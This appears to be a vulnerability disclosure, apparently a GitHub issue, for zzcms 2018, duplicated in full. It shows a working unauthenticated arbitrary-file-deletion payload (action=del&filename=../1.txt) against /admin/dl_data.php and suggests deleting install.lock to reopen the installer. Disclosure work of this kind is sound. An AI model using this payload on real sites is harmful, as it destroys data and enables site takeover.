Edition: zzcms 2018 data:2018-10-19 /admin/dl_data.php
0x01 Vulnerability
There is unlink($fp) to delete any file by controlloing the value of $_GET["filename"]
0x02 Control $fp
We can see
first ==> $_REQUEST['action'])
second ==> if ($action=="del")
so set url ==> action=del&filename=
0x03 payload
Payload is as follows, directly post: action=del&filename=../1.txt
remote attackers can delete arbitrary files via directory traversal
no authentication also can delete file
so we can delete /install/install.lock
The text was updated successfully, but these errors were encountered:
link: http://www.zzcms.net/about/6.htm

Edition: zzcms 2018 data:2018-10-19 /admin/dl_data.php

0x01 Vulnerability
There is unlink($fp) to delete any file by controlloing the value of $_GET["filename"]
0x02 Control $fp
We can see
first ==> $_REQUEST['action'])
second ==> if ($action=="del")
so set url ==> action=del&filename=
0x03 payload
Payload is as follows, directly post: action=del&filename=../1.txt
remote attackers can delete arbitrary files via directory traversal
no authentication also can delete file
so we can delete /install/install.lock
The text was updated successfully, but these errors were encountered: